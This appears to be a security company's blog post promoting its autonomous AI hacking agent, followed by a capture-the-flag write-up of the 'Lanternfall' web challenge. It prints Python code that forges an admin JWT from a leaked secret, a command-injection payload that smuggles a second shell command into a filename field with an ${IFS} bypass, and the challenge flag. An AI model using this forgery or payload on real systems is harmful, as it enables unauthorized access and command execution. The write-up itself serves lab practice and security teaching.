Strike7
Blog

Technical

Early-Stage AI Hacking Agent Secures Top 8% on Global Leaderboard

S7

By Strike7 Team

06 December, 2025 · 5 min read

The HackTheBox Neurogrid CTF brought together some of the most advanced security minds, tools, and emerging AI systems from around the world, pushing every competitor into a high-pressure arena where speed, adaptability, and creativity mattered more than ever.

For us, this event wasn't just another competition. It was a real-world proving ground for our early-stage AI Pentesting Agent, built on a single, general-context architecture still under active development. Unlike other teams running multi-agent orchestration layers, specialized solvers, or heavily optimized exploit pipelines, our goal was simple:

Test pure autonomous reasoning in a live, adversarial environment.

A New Era of AI-Driven Offense

The Neurogrid challenges were dynamic, unpredictable, and intentionally engineered to break static logic. They required:

  • Real-time adaptation
  • Complex exploit chaining
  • Multi-step reasoning under uncertainty
  • Handling shifting states and interactive environments
  • Understanding patterns humans normally detect intuitively

This is exactly the type of battlefield where traditional automation struggles — yet where next-generation offensive AI is meant to evolve.

Our single-agent model faced these complexities head-on, navigating reconnaissance, analysis, exploitation, and validation without preloaded CTF-specific tuning or hardcoded logic. Every move it made was driven by raw, generalized intelligence, not task-specific shortcuts.

What We Learned

Neurogrid validated one core belief:

AI agents can meaningfully compete in offensive cybersecurity far earlier than most expect.

But it also taught us where the next breakthroughs must happen:

  • Persistent cross-task memory
  • Multi-agent specialization
  • Smarter tool-use strategies
  • Adaptive planning with long context
  • Faster environment interpretation

Each challenge the agent encountered has become a roadmap item for what comes next.

What's Ahead

Neurogrid wasn't the finish line; it was the start of a new development chapter. Our upcoming releases will introduce:

  • Modular multi-agent architecture
  • Advanced exploit reasoning models
  • Autonomous chaining frameworks
  • Real-time adaptive learning loops
  • Native integration into continuous pentesting pipelines

The future of autonomous security testing is arriving fast, and we're building it one breakthrough at a time.

Technical Writeup: Challenge Solved by Strike7 — The AI Hacker Agent

This technical analysis documents how Strike7, our autonomous AI hacking agent, successfully identified, analyzed, and exploited a challenge within the Neurogrid CTF environment.

Designed with a general-context reasoning architecture, Strike7 approaches each task like a human pentester — performing reconnaissance, making assumptions, validating them, adapting to dynamic environments, and executing the final exploit chain.

Lanternfall (Web) — Writeup (Written by Strike7 AI Agent)

Challenge Description

Ayame has spent years weaving information networks through Gekkō's alleys… She needs a careful ally — someone to slip through the lantern-lit facade, catalogue the tampering, and restore balance without shattering the trust of the people she protects.

Solution

The Strike7 AI Agent autonomously solved this challenge through systematic reconnaissance, automated vulnerability discovery, and tool-driven exploitation. The solution involved discovering a leaked JWT secret in client-side code, forging an admin JWT token, and exploiting a command injection vulnerability in the reporting feature.

1. Automated Reconnaissance & Discovery

The agent initiated the assessment by performing automated reconnaissance using specialized tools. It first identified the application as a Next.js web application through HTTP response headers and client-side JavaScript analysis.

Automated Discovery Process:

  • The agent used specialized_recon_orchestrator to enumerate endpoints and analyze the app structure.
  • It automatically fetched and analyzed client-side JavaScript chunks.
  • The agent mapped multiple API endpoints:
  • /api/auth/login
  • /api/auth/register
  • /api/admin/reports
  • /api/admin/tokens
  • /api/admin/files

Critical Finding — Leaked Secret:

javascript
headers: {
  "X-Lantern-Sigil": "ayame_moonlight_gekko_secret_key_for_jwt_signing_do_not_use_in_production_2024"
}

The agent stored this finding as a high-confidence vulnerability, recognizing the severity of exposing a JWT signing secret client-side.

2. Automated Privilege Escalation (JWT Forgery)

Hypothesis Formation:

  • Observation: Leaked JWT secret found in client-side code
  • Hypothesis: The secret can be used to forge valid admin tokens
  • Confidence: 80%
  • Expected Outcome: Admin access

Automated Execution:

  1. Agent registered a standard user.
  2. Decoded JWT to confirm algorithm.
  3. Generated forged admin JWT:
python
import jwt
import time

secret = "ayame_moonlight_gekko_secret_key_for_jwt_signing_do_not_use_in_production_2024"

payload = {
  "sub": "2",
  "username": "hacker1",
  "role": "admin",
  "email": "[email protected]",
  "iat": int(time.time()),
  "exp": int(time.time()) + 3600
}

forged_token = jwt.encode(payload, secret, algorithm="HS256")

The agent validated the forged token by accessing admin endpoints.

3. Automated Vulnerability Assessment

  • /api/admin/files tested for LFI — blocked.
  • /api/admin/reports revealed an injectable filename parameter.

Command Injection Hypothesis:

  • Observation: Filename passed into server-side command
  • Hypothesis: Injection possible
  • Confidence: 70%

4. Automated Command Injection Exploitation

Payload Testing:

  • Initial injection attempt blocked due to whitespace filtering
  • Agent switched to ${IFS} bypass

Final Payload:

json
{
  "reportType": "user_activity",
  "format": "csv",
  "filename": "test";cat${IFS}/flag.txt;#"
}

The server responded with the flag, confirming successful remote command execution.

5. Automated Flag Extraction & Verification

Flag: HTB{4y4m3_g3kk0_m00nl1ght_4ll3ys_sh4d0w_w3b_902aec9fc171656a6a5a8fa0817c14b3}

Final Findings Stored

  • CRITICAL: Hardcoded JWT secret
  • CRITICAL: Forged admin access
  • CRITICAL: Command injection in report filename

Agent Execution Summary

  • Autonomous reconnaissance
  • Systematic vulnerability discovery
  • Adaptive exploitation strategies
  • Automated verification of all findings
  • Memory-based chaining of discoveries

Strike7 operated fully autonomously, adapting to shifting constraints and unknown environments, proving the viability of AI-driven offensive operations in real CTF scenarios.